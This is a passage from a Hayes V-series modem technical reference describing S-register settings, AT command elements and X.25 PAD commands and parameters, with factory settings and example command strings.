+the appropriate corresponding limit (e.g., if a value of 4099 is used, it is +assigned to the upper limit value of 4095). + +S76=40 Factory setting from a range of 0-40 +S77=95 Factory setting from a range of 0-99 + +S78, S79 - Outgoing Logical Channel Number (LCN) +The setting of registers S78 and S79 should be adjusted if the network +requires a range of Logical Channel Numbers outside those specified with the +combination of these two registers. + +S78 and S79 combine to determine the outgoing Logical Channel Number the +packet layer will use to place a call. The value is derived using S78 as the +two high decimal digits and S79 as the low two decimal digits, or the value +can be expressed by the formula S78 * 100 + S79. If the resulting value is +outside the range (4-4095), the value is then assigned to the appropriate +limit. The highest Logical Channel Number would be that derived from the above +formula, and the lowest would be the value minus the maximum number of +channels supported plus one. The user has the ability to override this factory +setting and explicitly specify an LCN using the PAD selection command (CALL). + +S78=0 Factory setting from a range of 0-40 +S79=16 Factory setting from a range of 0-99 + +A Note on Registers S80 and S81 (Packet Layer Parameters) +The values in these two registers combine to set time and duration for packet +layer restart requests. + +S80 - Packet Layer N20 Parameter +This register sets the maximum number of times a restart request can be +retransmitted. The factory setting is 1 (S80=1) from a range of 0-255. Setting +this register may be necessary if the network requires a restart attempt to +abandon a connection earlier than planned. + +S81 - Packet Layer T20 Parameter +This register sets the maximum amount of time the transmitter will wait for +acknowledgment of a restart request frame before initiating a recovery +procedure, in 10-second increments. The factory setting is 18 from a range of +0-255. Setting this register may be necessary if the network requires a +restart attempt to abandon a connection earlier than planned. + +S82 - Break Signaling Technique +This register selects a method of break signal handling for V.42 +communications: in sequence, expedited, and destructive. Break signals provide +a way for you to get the attention of the remote host. The break type used +depends on your application. + +3 Expedited signaling regardless of its sequence in data sent and + received; data integrity maintained +7 Destructive signaling regardless of its sequence in data sent and + received; data in process at time is destroyed +128 In sequence signaling as data is sent and received; data integrity + maintained ahead of and after break + +S84 - Adaptive start up negotiation (ASU) +This register selects the adaptive start up method to be negotiated for +subsequent connections. + +0 Do not negotiate ASU connection +128 Negotiate ASU with fixed start up +129 Negotiate ASU with fast start up on both sides +130 Negotiate ASU with smooth start up on both sides +131 Negotiate ASU with configuring modem using fast start up and the other + modem using smooth start up +132 Negotiate ASU with configuring modem using smooth start up and the other + modem using fast start up + +S85 - ASU Negotiation Report +This register indicates whether adaptive start up and method were negotiated +for the current connection. To read this register, issue the escape sequence +to place the modem in the command state, then issue ATS85? . The modem +will report one of the values below. + +0 ASU not negotiated; fixed start up in use +128 ASU negotiated with fixed start up +129 ASU negotiated with fast start up on both sides +130 ASU negotiated with smooth start up on both sides +131 ASU negotiated with reporting modem using fast start up and the other + modem using smooth start up +132 ASU negotiated with reporting modem using smooth start up and the other + modem using fast start up + +S86 - Connection Failure Cause +This register can help you determine the cause of a connection failure. When +the modem issues a NO CARRIER result code, a value is written to this +register. To read this register, following the connection failure, issue +ATS86? . The modem will report one of the values below. + +0 Normal hang up; no error occurred +4 Physical carrier loss +5 Feature negotiation failed to detect presence of another error-control + modem at the other end +6 Other error-control modem did not respond to feature negotiation message + sent by this modem +7 Other modem is synchronous-only; this modem is asynchronous-only +8 Modems could not find a common framing technique +9 Modems could not find a protocol in common +10 Feature negotiation message sent by other modem incorrect +11 Synchronous information (data or flags) not received from other modem. + Modem waited 30 seconds before hanging up +12 Normal disconnect initiated by other modem +13 Other modem did not respond after many transmissions of the same + message. Modem made 10 attempts then hung up +14 Protocol violation occurred +15 Compression failure + +Note: Multiple occurrences may contribute to a NO CARRIER message; S86 records +the first event that occurred. + +S92 - MI/MIC Options +This register enables (chooses method) or disables the mode indicate/mode +indicate common interface. The settings available for this register support +various combinations of edge and level detection in either originate or answer +mode with ring indicator (RI) pulse enabled or disabled. For particulars as to +how the jack setting specified with the &J command interacts with this +register, see the modem's Installation Guide. + +0 MI/MIC disabled +1 level triggered, originate mode, RI pulse enabled +3 edge triggered, originate mode, RI pulse enabled +5 level triggered, answer mode, RI pulse enabled +7 edge triggered, answer mode, RI pulse enabled +9 level triggered, originate mode, RI pulse disabled +11 edge triggered, originate mode, RI pulse disabled +13 level triggered, answer mode, RI pulse disabled +15 edge triggered, answer mode, RI pulse disabled + +Note that this feature is not available to all modems. Refer to the feature +list in the modem's Installation Guide. + +S93 - V.25bis DTE interface speed +This register selects the speed used when the modem is configured for V.25bis +mode. When autobauding in any mode other than V.25bis, the modem uses the +value held in S37. + +3 300 bps +5 1200 bps +6 2400 bps +7 4800 bps +9 9600 bps + +Note that the V.25bis feature is not available to all modems. Refer to the +feature list in the modem's Installation Guide. + +S94 - Command Mode Selector +This register provides an alternative to setting internal DIP switches when +choosing between the AT command mode (factory setting) and the various CCITT +V.25bis command modes supported by the modem. To use this register, DIP +switches 3 and 4 must both be in the UP position (factory setting). + +0 Standard AT command operation (factory setting) +1 Asynchronous V.25bis using addressed access +2 Synchronous V.25bis (HDLC framing) using addressed access +3 Synchronous V.25bis (Character framing) using addressed access +5 Asynchronous V.25bis using direct access +6 Synchronous V.25bis (HDLC framing) using direct access +7 Synchronous V.25bis (Character framing) using direct access +9 Asynchronous V.25bis using addressed access with EBCDIC character set + option +10 Synchronous V.25bis (HDLC framing) using addressed access with EBCDIC + character set option +11 Synchronous V.25bis (Character framing) using addressed access with + EBCDIC character set option +13 Asynchronous V.25bis using direct access with EBCDIC character set + option +14 Synchronous V.25bis (HDLC framing) using direct access with EBCDIC + character set option +15 Synchronous V.25bis (Character framing) using direct access with EBCDIC + character set option + +S95 - Negotiation Message Options +This register enables various result codes that indicate the sequence of +events in the establishment of an error-control connection. This register does +not affect the way in which the modem negotiates the connection; it merely +enables message options. The factory setting for this register is value 0, no +bits selected. To enable any combination of the bits, add the value(s) to the +right of the bit number and set the register to this sum. + +Note: The bit values of S95 may be set to override some of the characteristics +of the Wn command. Setting any of the S95 bits to "1" enables the +corresponding result codes regardless of the Wn command in effect. Changing +the Wn command setting does not affect the value set for this register. + +Bit Value Explanation +0 1 Verbose CONNECT result code indicates the DCE speed (rather than + DTE speed). Numeric result codes are also differennt when + CONNECT reports DCE speed. +1 2 Append "/ARQ" to CONNECT result code when an error-control + connection is made +2 4 Add CARRIER messages +3 8 Add PROTOCOL messages +4 16 Add AUTOSTREAM messages +5 32 Add COMPRESSION messages + +For example, if you want to add the compression result code (with W1 +selected), you would select bit 5 (value of 32). The command line ATS95=32 + will then enable the COMPRESSION negotiation messages. + +Refer to the Wn and Xn commands for additional and related information. + + +***************************************************************************** +1.4 Additional Command Set Definitions +The following items are critical parts of the AT Command Set, although they +are not "commands." The AT prefix, the escape sequence, end-of-line character, +and repeat last command function round out the elements of the command set. + +AT - Command Prefix +Modem commands begin with an AT prefix that gets the modem's attention. The +speed and character format at which the DTE sends this prefix tells the modem +the speed and format for responding to commands, and at which speed to attempt +the connection. See the Installation Guide for the speeds, formats, and +transmission methods supported by your modem. + ++++ - Escape Sequence +The escape sequence is used to take the modem from the on-line state ( or "on- +line" command state) to the command state without breaking the connection. +This provides a means of changing a setting then going back on-line. + +Not actually a command, the escape sequence tells the modem to "escape" or +leave the on-line state and enter the command state. The sequence consists of +a single character issued three times in succession. A one-second "guard time" +interval prevents the modem from mistaking a random occurrence of the same +three characters as the escape sequence. The character used in the sequence +and the duration of the guard time can be changed by writing values to S2 and +S12, respectively. + +The escape sequence is issued by typing the plus key three times (+++) in +succession. A pause of at least a second should precede and follow the three +characters. The modem will return the OK result code as an indication it is +ready to accept commands. + + - End-of-line Character +This key terminates the command line. The key enabling this function is +determined by the value stored in S3. The factory setting is ASCII 13, the +carriage return character. When the end-of-line character is entered, the +modem executes the commands that follow the AT prefix. In this reference, this +key is referred to as . For example, the command line ATV0 gets the +modem's attention, then instructs the modem to display its responses to +commands (result codes) as numbers. + +A/ - Repeat Last Command +A/ re-issues the command string most recently placed in the command buffer. +This keystroke combination can be used to re-issue the command string last +entered. For example, the A/ (if permitted by your local telephone system) is +useful as a re-dial function. + + +============================================================================= + +Chapter Two: +V-series X.25 Communications + +This chapter includes information about the use of X.25 communications with V- +series System Products. The command and parameter descriptions are more +detailed than those offered in the V-series System Product User's Reference. +Also included are four recommended PAD profiles that can be recalled from +memory to use with the modem's PAD. + +The factory settings and available options/ranges for these commands and +parameters are provided here because they are the same for all V-series System +Products that support the X.25 feature. + + +***************************************************************************** +2.1 Modem Configuration for X.25 Communications +X.25 connections begin the same as point-to-point connections - with a modem +call to a remote system. Your modem is configured from the factory to +automatically negotiate the best point-to-point error-control connection, if +the purpose of the call is to establish a link with an X.25 network, the modem +must be re-configured with several S-Registers. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +2.1.1 Controlling Automatic Feature Negotiation +The S-Registers controlling connection type selection are described in the +sections that follow. An overview of the the options that can be set with S- +Registers is provided in the chart below. + +Communication Environment &Q S36 S44 S46 S48 +----------------------------------------------------------------------------- +X.25 enabled (Use X.25 if remote system +has X.25; otherwise, use LAP-B point-to-point +connection) 5 0 3 6 3 +X.25 only (Point-to-point connection) 5 0 3 134 3 +X.25 network without feature negotiation: 5 0 3 6 0 +X.25 network with feature negotiation 5 0 3 6 3 +X.25 network with feature negotiation and AFT 5 0 2 6 3 + +The suggested configuration for establishing a synchronous X.25 connection +with a packet switched network or a remote V-series System Product that +supports X.25, can be selected with AT&Q5 S44=3 S46=6 S48=0 . Refer to the +S-Register Listing in Chapter One for a description of the registers that can +be used to configure the modem. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +2.1.2 PAD Channel Selection +The &O command is used to move from the AT command state to the PAD command +state in order to issue PAD commands. The optional channel number identifies +the desired virtual channel number. If the virtual channel number is zero +(&O0), or not specified (&O), the last channel number accessed is used. Each +time &O is issued, it resets the current PAD before it enters the PAD command +state (provided a virtual connection is established). + +Once the PAD command state is entered, the CHAN command can be used to switch +among the PAD command states of the four virtual channels. + +If an X.25 connection has already been established and you have escaped to the +AT command state, the PROTOCOL and CONNECT result codes are transmitted to +your terminal. The ERROR result code is transmitted if the modem is on-line +but not in X.25 mode (e.g., modem is in Error-Control/LAP-B mode). + +Example of &O command use: + +String Result Code/Explanation + +AT&O1 OK (PAD channel 1 selected) + +AT&O9 ERROR (value entered is out of selectable range) + +See the description of the &O command in the AT Command Listing in Chapter +One. + + +***************************************************************************** +2.2 PAD Configuration +Like your modem, the PAD can be configured according to the communications +requirements of the remote systems you call. + +Although a small number of S-Registers control some PAD options (packet and +window sizes, for example), the PAD is primarily configured with separate +memory locations. A set of PAD parameters can be configured for each channel. +The set consists of standard X.25 PAD parameters and National parameters. + +Although the PAD's factory-set configuration will be suitable for many +applications, sets of predefined PAD parameter settings can be defined as +profiles to be recalled for use with later. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +2.2.1 PAD Commands +Each PAD command consists of characters and occasionally symbols that specify +the command's action. Like the AT command line, you can place as many as 255 +characters on a single line. + +The only exception to this format is the EXEC command. This command for +storing and executing a series of instructions to configure the PAD uses a +plus sign (+) to tie commands together in the command string. When these +commands are executed, the plus signs are treated as carriage returns. For +more on storing a PAD configuration with the EXEC command, see "PAD Profiles." + +Issuing PAD commands +PAD commands are typed at the PAD prompt, then entered with . This action +and most other conventions for editing a line and entering commands are the +same as those use when issuing AT commands. + +PAD command format +Each PAD command consists of characters and occasionally symbols that specify +what the command will do. A PAD command is typed on the command line, then +entered using the carriage return key (factory setting for S3). + +When you type in a command, the PAD ignores spaces, delete characters, control +characters, and upper/lower case. For example, the commands RESET, RE SET, and +reset are all interpreted as the same command. The backspace key can be used +to correct any mistakes made while entering a command. In this addendum, the +following symbols are used when describing PAD commands. + +Symbol Meaning +----------------------------------------------------------------------------- +[ ] Indicates optional parameters, parameters which can be entered with + the PAD command +< > Indicates a named parameter, such as a user ID requested by the + network +... Indicates a repeated item within brackets, for example the command + PAR? [][,...] + +These symbols represent the kinds of information that can accompany a PAD +command. Do not type these symbols when entering a PAD command. + +Any characters that appear with a PAD command, other than the symbols +mentioned above, are interpreted literally. For example, the command: ACC [R] +[ -] is interpreted: + +Symbol Meaning +----------------------------------------------------------------------------- +ACC Issue the Accept command which indicates that you want to + accept a call +[R] Include an optional parameter (R) instructing network that + you will accept charges for the call if requested +[ -] Include an optional facility parameter, such as your user ID, + or some other information required by the network. Several + facilities can be strung together, separating each by a comma + and ending the string with a hyphen (-) + +PAD commands are of two types: those used for call related activities, such as +placing a call, answering a call, initializing and changing channels, etc., +and those used to configure the PAD. These commands can be used in the +following ways: + +* place and answer calls (CALL, ACC) +* move between channels (CHAN, EXIT) +* create, save, and execute a PAD command string (EXEC) +* clear and initialize channels (CLR, INT) +* display the current status of a call (STAT) +* display one of several available PAD configuration profiles (PROF) +* display the current settings of the PAD's parameters (PAR?) +* display the current settings of the remote system's PAD parameters (RPAR?) +* set and read the value of specific PAD parameters (SET, SET?) +* set and read the value of specific PAD parameters of the remote system + (RSET, RSET?) + +The commands supported by the PAD are listed in the following sections. Each +command is defined with sample formats, allowable parameters, and possible +result codes for the command. + +ACC - Accept Call Command +When you have established a connection to the network node and a remote system +on the network wants to call you, a PAD result code is sent to your computer +announcing the incoming call. Enter the ACC command to accept the call and +establish a virtual connection. + +To configure the PAD to automatically answer incoming calls, use the EXEC +command described following this command. + +Example Format +ACC [R] [] + +Parameter Description +----------------------------------------------------------------------------- +[R] Instructs the network that you will accept charges for the call if + requested to do so + Represents optional call facilities may be entered + +Result Codes: Description +----------------------------------------------------------------------------- +CON ACC received +ERR Invalid command format; or command not entered in response to an + incoming call; or virtual connection not established + +CALL - Call Command +The CALL command is the PAD command you use to make a virtual connection to a +remote system. Once the PAD is configured, this is the primary command you +will use. + +Once a physical connection to the X.25 network has been established, a virtual +connection to the remote system is made with the CALL command. If the call is +accepted by the remote system, the PAD enters the data transfer state. If the +call is not accepted, a "call cleared" response is sent and the PAD remains in +the PAD command state. + +Example Formats +CALL +[CALL] [] [ [,[] [,] ] ] +[CALL] D +[CALL] D +[CALL] [,[] [,] ] D + +Parameter Description +----------------------------------------------------------------------------- + One or more call parameter facilities that can be strung + together on a command line and separated by commas; the last + facility is followed by a hyphen (-) + Represents remote system's address containing up to 15 digits (0-9) + Represents source address containing up to 15 digits (0-9) + X.25 logical channel number (1-4095) + Character string containing up to 12 ASCII characters + +Result Codes Description +----------------------------------------------------------------------------- +ERR Call cannot be placed due to call in progress; or virtual + connection not established +CLR Remote PAD cleared virtual connection; may be followed by a + string of diagnostic characters +CON Call connected; may be followed by a string of diagnostic + characters + +Call Facilities +In the above CALL command formats, notice the field. This field is +provided to specify "call facilities." A call facility is an optional +parameter that can be specified to meet a network's requirements, such as +entering a network user ID (NUI), or indicating that charges are to be +reversed (R). + +When subscribing to a packet switched network, you are informed of the +required or permitted call facilities. In order to respond to your CALL +command, different networks may require specific call facilities. + +Any of the following call facilities with the CALL command. When two or more +facilities are entered on a line, they are separated by commas. A hyphen (-) +terminates the string. For example: CALL R,N, - + +The table below provides a description of the available call facilities. + +Call Facility Description +----------------------------------------------------------------------------- +R Instructs network that you will accept charges for the call if + requested to do so +N Provides network with network user ID, identifying the caller + to the network +T Specifies which networks the data packets take to their + destination. Any number of addresses may be specified; each + address is four digits (0-9). RPOA stands for "Recognized + Private Operating Agencies" +P Requested maximum packet size according to the following packet + size-to-bytes conversions: P4=16, P5=32, P6=64, P7=128, P8=256, + P9=512. If P is not specified, the default value (128) of + National Parameter 100 is used +W Requested maximum window size (2-7). If W is not specified, the + default value (2) of National parameter 101 is used +X Hexadecimal data (0-9, A-F). Caution: Putting data directly + into the facilities field of the call packet, specifies + facility codes not directly supported by the modem + +CHAN - Channel Selection Command +Use the CHAN command to switch from one virtual channel to another. The modem +remains in the PAD command state. + +Example Format +CHAN + +Parameter Description +----------------------------------------------------------------------------- + Specifies which virtual channel to switch to, indicated by an + ASCII digit (1-4) + +Result Codes: Description +----------------------------------------------------------------------------- +ERR Invalid specified + +CLR - Clear Channel Command +After a virtual connection has been established, the CLR command can be used +to clear (disconnect) a call on a virtual channel and place that channel in +the PAD command state. + +Example Format +CLR [X -] [] + +Parameters Description +----------------------------------------------------------------------------- + Hexadecimal data (0-9, A-F) supporting facilities not + supported by the V-series X.25 product + String of up to three digits from a range of 1-255, + indicating the error that has occurred + +Result Codes Description +----------------------------------------------------------------------------- +ERR Virtual connection not established on this channel; or invalid + parameter entered + +EXEC - Execute String Command +The EXEC command is used to define and save a PAD command and then +automatically execute it when a physical connection to a network node is +established. EXEC is commonly used to define the CALL command. Another common +use of EXEC is to automatically answer an incoming call. + +The string stored in each virtual channel as the factory setting is ANS+ACC, +which instructs the PAD to answer and accept incoming calls to the channel. To +display the string currently stored, you can issue EXEC? . + +Sample EXEC sequence: +To use the EXEC command, from the PAD command state type EXEC . The PAD +will display the prompt: EXEC>. After the prompt, enter the PAD command you +wish to save. For example: + +EXEC> CALL R- 3110 20200202 + +This stores a CALL command for connecting to a packet switched network. As +soon as the modem establishes a physical connection to the network node, the +EXEC string is processed, placing the call. + +In the EXEC string that you define, plus signs can be used to separate +multiple commands. When the EXEC string is executed, the plus signs are +treated like carriage returns. For example, the following EXEC string defines +how the PAD will respond to an incoming call from remote system: + +EXEC> ANS+PROF VSM+SET 0:0,74:1+ACC + +In this EXEC string, the PAD is instructed to: + +ANS Respond to an incoming call request +PROF VSM Load the V-series emulation PAD profile +SET 0:0 Set the National marker in order to change a National parameter +74:1 Change National parameter 74 to 1 +ACC Accept the call + +In another example: + +EXEC>ANS+ACC+Welcome to Hayes/M/JX.25//dial-up!/M/J + +the PAD is instructed to: + +ANS Respond to an incoming call request. +ACC Accept the call. + +Welcome to Hayes/M/JX.25//dial-up!/M/J is sent to the remote system. + +"/M" means "control M," a carriage return; +"/J" means "control J," a line feed. + +This message is received by the remote system as: + +Welcome to Hayes +X.25/dial-up! + +To display the current EXEC string (if any) stored in memory, type EXEC? . + +EXIT - Exit PAD Command +Use the EXIT command to leave the PAD command state and enter the modem's AT +command state. For example, if you are in the PAD command state (of any +virtual channel) and you want to hang up the phone, first type: + +EXIT the OK result code is sent from the modem to the attached computer + +then type: + +ATH0 This AT command hangs up the modem, breaking the physical +connection to network; the OK result code is returned if the modem hangs up +before the network; if the network hangs up first, the NO CARRIER result code +is returned). Hanging up clears all virtual connections still engaged. + +INT - Interrupt Command +During a virtual connection, the INT command can be issued to send an +interrupt, placing the PAD in the on-line state. Networks respond to +interrupts differently, however. This command can result in lost data. It +should not be used unless its use has been cleared through the network. + +Example Format +INT + +Result Codes: Description +----------------------------------------------------------------------------- + The remote host has acknowledged the interrupt +ERR Virtual connection not established on this channel + +PAR? - Read Parameter Command +The PAR? command displays the current settings of the local PAD. Settings for +selected PAD parameters can be requested or if the command is issued with no +parameters, the settings for all twenty-two PAD parameters are requested. + +Note: To display the settings for the National PAD parameters, enter a zero +(0) after the command (PAR?0). + +Example Format +PAR? [] [,...] + +Parameter Description +----------------------------------------------------------------------------- + Number of specific PAD parameter setting to display. If no PAD + parameters are specified, the settings for all 22 PAD parameters + are displayed. Enter a zero (0) to display the settings for all + of the National PAD parameters. + +Result Codes Description +----------------------------------------------------------------------------- +ERR Invalid command format +:INV Invalid parameter entered. For example, if PAR?40 were + typed, PAR 40:INV would be displayed since 40 is out of the + range 1-22 + +For example, issuing PAR? 1,4,0,70,71 displays the current settings for the +specified parameters (1,4,0,70, 71) of the local PAD: PAR 1:0, 4:0, 0:0, 70:1, +71:0 + +If no parameters are specified: PAR? the settings for all twenty-two PAD +parameters are displayed: +PAR 1:0, 2:0, 3:0, 4:0, 5:0, 6:5, 7:5, 8:0, 9:0, 10:0, 11:14,12:0, 13:0, 14:0, +15:0, 16:8, 17:24, 18:18, 19:1, 20:65, 21:0,22:0 + +PROF - PAD Profile Command +A "profile" is a predefined collection of PAD parameter settings used for a +virtual connection, similar to the profiles that can be defined for the +modem's general configuration. With the PROF command, one of four standard +profiles can be selected, or a particular configuration can be defined and +saved as a profile in nonvolatile memory. + +Example Format +PROF + + +Parameter Description +----------------------------------------------------------------------------- + Enter the alphanumeric characters that specify the profile to + be recalled for the current channel. Possible identifiers are: + +DEF Selects the factory default profile + +SIM Selects CCITT simple standard profile + +TRA Selects CCITT transparent standard profile + +VSM Selects V-series Error-Control/LAP-B emulation profile +NVM Selects the profile saved in nonvolatile memory + +SAV Saves the current PAD configuration profile in nonvolatile + memory + + +Result Codes: Description +--------------------------------------- +ERR Invalid + +The V-series Emulation Profile (VSM) is automatically set if feature +negotiation results in an Error-Control/LAP-B connection on virtual channel 1 +(Error-Control/LAP-B connections always use virtual channel 1). The +configuration profile is automatically restored to its factory setting when +the the modem hangs up. + +To create a profile, use the CHAN command to move to the desired channel. For +example, issue CHAN3 to move to channel 3. At the prompt, type in the PAD +parameters you want to adjust and store, issuing them with . To save the +settings as a profile, issue PROF SAV . + +RESET - PAD Reset Command +The RESET command resets the virtual channel. If your system locks up +unexpectedly, or data transfer has stopped, or you are unable to reach the +remote system, you may wish to reset the virtual channel and start over. +Issuing the RESET command may result in lost data. + +Example Format +RESET [ ] + +Parameter Description +----------------------------------------------------------------------------- + String of up to three numeric digits from a range of 0-255 + indicating an error has occurred + +Result Codes: Description +----------------------------------------------------------------------------- +ERR Virtual connection not established on this channel + +RPAR? - Read Remote PAD Parameter Command +To display the current settings of the remote system's PAD parameters, use the +RPAR? command. If no parameters are specified, the settings for all of the +remote system's PAD parameters are displayed. + +Example Format +RPAR? [] [,...] + +Parameter Description +----------------------------------------------------------------------------- + Specifies the remote system's PAD parameter(s) to display + +Result Codes Description +ERR Invalid command format; or virtual connection not + established on this channel +:INV Invalid parameter entered; or remote system does not support + parameter specified + +For example, issuing RPAR? 1,4,0,70,71 + +displays the current settings for the specified parameters of the remote +system's PAD. The string: RPAR 1:0, 4:0, 0:0, 70:1, 71:0 is displayed. + +If no parameters are specified: RPAR? the settings for all of the remote +system's PAD parameters are displayed. + +RSET - Set Remote PAD Parameter Command +To set and display the remote system's PAD parameters, use the RSET command. + +Example Format +RSET [?] [:] [,:] [, ...] + +Parameter Description + Specifies the number of the remote system's PAD parameter you + want to set/display + Value that you want to set for the specified PAD parameter + +Result Codes Description +----------------------------------------------------------------------------- +ERR Invalid command format +:INV Invalid parameter or value + +For example, entering RSET 2:1 sets the remote system's PAD parameter 2 +to a value of 1. + +To display the setting, type: RSET? 2:1. The new parameter setting will be +displayed: RPAR 2:1 + +STAT - Status of Current Channel Command +The STAT command displays the current status of a virtual connection. + +Example Format +STAT + +Result Codes: Description +------------------------------------ +FREE No call in progress +ENGAGED Call in progress + +SET - Set PAD Parameter Command +To set (and display) the local PAD's parameters, use the SET command. + +Example Format +SET [?] [:] [,:] [, ...] + +Parameter Description +----------------------------------------------------------------------------- + Specifies the number of the PAD parameter to set/display + Value that you want to set for the specified PAD parameter + +Result Codes Description +----------------------------------------------------------------------------- +ERR Invalid command format +:INV Invalid parameter or value + +For example, issuing SET 2:1 sets PAD parameter 2 to a value of 1. + +To display the setting, type: SET? 2:1 . The new parameter setting will be +displayed: PAR 2:1 + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +2.2.2 PAD Parameters +PAD parameters are used to control the display and transmission of data over +the packet switched network. + +Parameters are of two types: PAD Parameters and National Parameters. Twenty- +two PAD parameters (1-22) and an additional set of "National Parameters" offer +configuration options. National Parameters (numbers starting at 70) are used +to support and control the enhanced functionality provided by the Hayes X.25 +feature. All parameters are set and read the same way. + +Values for some parameters are calculated by adding the bit values of the +options you want active. For example, in PAD parameter 3, if you want the +character set to include A-Z, a-z, 0-9 (bit value=1) and CR (bit value=2), you +would set the PAD parameter 3 to 3. + +A marker (0:0), called a "National Marker," is used to separate the National +PAD Parameters from the PAD parameters. For example, in the PAD command: SET +1:1, 2:0, 0:0, 70:1, the characters to the right of the marker refer to +National PAD parameters. Characters to the left of the National marker refer +to PAD parameters. + +Parameter 1 - PAD Recall Using a Character +PAD recall defines the character that will force the PAD to escape from the +PAD on-line state and return to the PAD command state. When the PAD receives +this character, the PAD prompt (- or *) is displayed on the user's terminal +monitor. + +Values Description +----------------------------------------------------------------------------- +0 PAD cannot be recalled using a character (factory setting) +32-126 ASCII graphic character + +To send the PAD recall character as data, enter it twice. The PAD will remain +in the on-line state. + +Parameter 2 - Echo +When parameter 2 is set, all characters received from the terminal are echoed, +excluding those specified by parameter 20 (echo mask), parameter 5 (ancillary +device control), parameter 12 (flow control of the PAD by the terminal) and +parameter 22 (page wait). Setting parameters 12 or 22 to non-zero values +causes the echo of characters DC1 and DC3 (XON and XOFF) to be suppressed, +even if parameter 2 is set to value 1. + +Values Description +------------------------------------ +0 No echo (factory setting) +1 Echo + +Parameter 3 - Selection of Data Forwarding Signal +The value of parameter 3 is bit-mapped; the binary bit values represent the +character sets listed below. If the character(s) set by the combination of +binary bit values of this parameter is received from your terminal, the +current packet (including this character) is forwarded. + +Values Description +--------------------------------------------------- +0-127 sum of bits for selected characters +0 No data forwarding signal (factory setting) + +Bit Value Description +----------------------------------------------------------------------------- +1 A-Z, a-z, 0-9 +2 CR +4 ESC, BEL, ENQ, ACK +8 DEL, CAN, DC2 +16 ETX, EOT +32 HT, LF, VT, FF +64 NUL, SOH, STX, BS, SO, SI, DLE, DC1, DC3, DC4, NAK, + SYN, ETB, EM, SUB, FS, GS, RS, US, DEL + +Parameter 4 - Selection of Idle Timer Delay +In addition to character forwarding, this parameter provides the capability to +forward data to the host based on an idle time. If data is in the buffer and +no additional characters have been received for the specified period, the +buffer contents are sent to the host. Parameter 4 is ignored if National +Parameter 70 (streaming data forwarding) is set to 1, or if parameter 15 is +set to 1. + +Values Description +----------------------------------------------------------------------------- +0 No data forwarding on timeout +1 - 255 Data forwarding on timeout of multiplied by 0.05 seconds +50 50 msec. timeout (factory setting) + +Parameter 5 - Ancillary Device Control +This parameter specifies whether or not the PAD transmits XON-XOFF characters +to the DTE. If flow control is disabled, the user must be careful not to +overflow the PAD's buffer in order to prevent data loss. Local flow control is +also enabled by the &K command. + +Values Description +----------------------------------------------------------------------------- +0 No XON/ XOFF flow control (factory setting) +1 XON/XOFF flow control in data transfer state +2 XON/XOFF flow control in both data transfer and PAD command states + +Parameter 6 - Control of PAD Result Codes +Parameter 6 controls how PAD result codes (those generated by the PAD) are to +be transmitted to your terminal. + +Values Description +----------------------------------------------------------------------------- +0 No PAD result codes are sent to your terminal +1 PAD result codes are sent in their standard formats. The prompt + PAD result code is not sent +4 Only the prompt PAD result code is sent +5 All PAD result codes, including the prompt PAD result code, are + sent in the standard format (factory setting) + +Parameter 7 - Action on Receipt of Break from Terminal +Parameter 7 is bit-mapped; binary bit values represent the following actions +when the break signal is received by the PAD. + +Values 0-31 +Factory Setting: 5 (send interrupt and indication of break) + +Bit Values Description +----------------------------------------------------------------------------- +1 Send an X.25 interrupt packet to the remote system +2 Send an X.25 reset packet to the remote system +4 Send an X.25 indication of break packet to the remote system +8 Escape from the data transfer state to the PAD command state +16 Set PAD parameter 8 to 1 (discard output) + +Note: If bit 2 of S53 is set, escape from the data transfer state using the +break signal is not possible. + +Parameter 8 - Discard Output +This parameter is set if the user wishes to abort a process running on the +remote system by pressing the break key. When the break key is used, incoming +data is discarded until the remote system reacts to the break signal, and sets +parameter 8 back to 0. + +Values Description +----------------------------------------------------------------------------- +0 Normal data delivery to your terminal (factory setting) +1 Discard output destined to your terminal + +Note: Parameter 8 cannot be set using the SET command; only the remote PAD can +set it. + +Parameter 9 - Padding after Carriage Return +Parameter 9 specifies the number of ASCII NUL characters to transmit after a +carriage return. This may be necessary to allow time for mechanical devices to +return to a home position after a carriage return has been sent. + +Values Description +----------------------------------------------------------------------------- +0 No padding characters sent after carriage return (factory setting) +1 Number of padding characters (NUL) sent after carriage return + +Parameter 10 - Line Folding +This parameter specifies line length. When the specified number of displayable +characters have been sent to the terminal, a carriage return/line feed +sequence is transmitted. Normally, this function is disabled. + +Values Description +----------------------------------------------------------------------------- +0 No line folding (factory setting) +1 -255 Number of graphic characters per line sent by the PAD before a CR/LF + is inserted. Special cases include the backspace character which + decreases the count of graphic characters, and HT that follows the + convention of tab stops every eighth column for display terminals, if + parameter 19 = 2 + +Parameter 11 - Terminal Speed +This parameter reflects the current speed of the DTE. It is automatically set +by the PAD using the last AT command and may not be updated by the user or +remote system (read only). + +Values READ ONLY; no factory setting + +Value Bit Rate +---------------------------- +0 110 bps +2 300 bps +3 1200 bps +4 600 bps +5 75 bps +12 2400 bps +13 4800 bps +14 7200 or 9600 bps +15 14400 or 19200 bps +16 38400 bps + +Parameter 12 - Flow Control of the PAD by Local Terminal +Parameter 12 determines whether or not the PAD recognizes flow control +characters issued from the DTE. If the DTE transmits an XOFF (Ctrl-S), no +further data is delivered to the DTE until the PAD receives an XON (Ctrl-Q). +Flow control is also enabled by the &K command. + +Values Description +----------------------------------------------------------------------------- +0 No XON / XOFF flow control (factory setting) +1 Use of XON / XOFF flow control + +Parameter 13 - Line Feed Insertion after Carriage Return +This parameter specifies whether or not the PAD will insert a line feed +character after carriage returns. This function applies only in the PAD on- +line state. + +Values Description +----------------------------------------------------------------------------- +0 No line feed inserted (factory setting) +1 Insert line feed after carriage return in the incoming data stream +2 Insert line feed after carriage return in the outgoing data stream +3 Insert line feed after carriage return in the data stream +4 Insert line feed after echo of carriage return +5 Insert line feed after carriage return in incoming data stream and + also after carriage return echo +6 Insert line feed after carriage return in the outgoing data stream and + also after carriage return echo; if editing enabled (parameter 15=1), + insert line feed in the next editing buffer and make available for + editing +7 Insert line feed after carriage return in the incoming and the outgoing + data stream, also after carriage return echo; if editing is enabled + (parameter 15=1), insert line feed in the next editing buffer and make + available for editing + +Parameter 14 - Line Feed Padding +In the on-line data transfer state only, parameter 14 specifies the number of +ASCII NUL characters to transmit after a LINE FEED. This parameter is required +by some devices to allow sufficient time to move the platen after receiving a 